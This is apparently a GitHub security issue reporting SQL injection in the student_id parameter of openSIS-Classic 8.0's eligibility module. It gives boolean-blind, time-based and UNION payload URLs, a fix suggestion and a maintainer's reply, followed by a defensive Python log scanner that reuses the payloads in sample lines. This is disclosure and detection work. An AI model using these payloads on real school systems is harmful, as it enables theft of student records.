SQL Injection in /modules/eligibility/Student.php #248

Closed
zerrr0 opened this issue Mar 7, 2022 · 1 comment

zerrr0 commented Mar 7, 2022

Due to lack of protection, the parameter student_id in /modules/eligibility/Student.php can be abused to inject SQL queries to extract information from databases.

POC:

Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=(SELECT (CASE WHEN (5146=5146) THEN 15 ELSE (SELECT 5608 UNION SELECT 5507) END))&ajax=true

Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 AND 2719=BENCHMARK(5000000,MD5(0x5246526f))&ajax=true

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706271,0x6b67466d72447a6e53786a6d4c527a71657250527871584356544f484c4a417a494c48637847576d,0x7170786b71),NULL,NULL-- -&ajax=true

Traceback:
openSIS-Classic-8.0/modules/eligibility/Student.php
Solution:
Use the function sqlSecurityFilter() before assigning $_REQUEST['student_id'] into the "SELECT" query.

sarika0lal added a commit that referenced this issue Mar 31, 2022
@sarika0lal
Contributor

Hello,

We appreciate your observation and would like to inform you that your suggestion has been implemented. Please check and let us know your feedback in case you have any.

Thank you.
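
A log check for the request pattern reported in this issue, added here as an example and not part of the issue or the openSIS code base: it flags requests with modname=eligibility/Student.php whose student_id is not a plain integer. The integer-only rule, the function names and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

MODULE = "eligibility/Student.php"      # modname value named in the report
VALID_ID = re.compile(r"[0-9]{1,10}")   # assumption: student IDs are plain integers
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')


def bad_student_ids(log_line):
    """Return the decoded student_id values in this request that are not plain integers."""
    match = REQUEST_LINE.search(log_line)
    if not match:
        return []
    # parse_qs percent-decodes values and splits each pair on the first '=' only
    params = parse_qs(urlsplit(match.group(1)).query)
    if MODULE not in params.get("modname", []):
        return []
    return [v for v in params.get("student_id", []) if not VALID_ID.fullmatch(v)]


def scan(lines):
    """Return (client_ip, decoded_value) for every suspicious request."""
    hits = []
    for line in lines:
        client = line.split(" ", 1)[0]
        hits.extend((client, value) for value in bad_student_ids(line))
    return hits


# Constructed access-log lines (combined format, documentation IP ranges).
# The query strings reuse the request shapes quoted in the report, percent-encoded.
PREFIX = "GET /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id="
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Mar/2022:10:00:01 +0000] "' + PREFIX + '15&ajax=true HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Mar/2022:10:02:13 +0000] "' + PREFIX
    + '15%20AND%202719=BENCHMARK(5000000,MD5(0x5246526f))&ajax=true HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Mar/2022:10:02:20 +0000] "' + PREFIX
    + '%28SELECT%20%28CASE%20WHEN%20%285146%3D5146%29%20THEN%2015%20ELSE%20'
    + '%28SELECT%205608%20UNION%20SELECT%205507%29%20END%29%29&ajax=true HTTP/1.1" 200 5120',
    '192.0.2.10 - - [07/Mar/2022:10:03:00 +0000] "GET /openSIS-Classic-8.0/index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}\tnon-numeric student_id: {value!r}")
```

Only the query string is inspected, so a student_id sent in a POST body does not appear in an access log and needs a WAF or application-level check instead.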
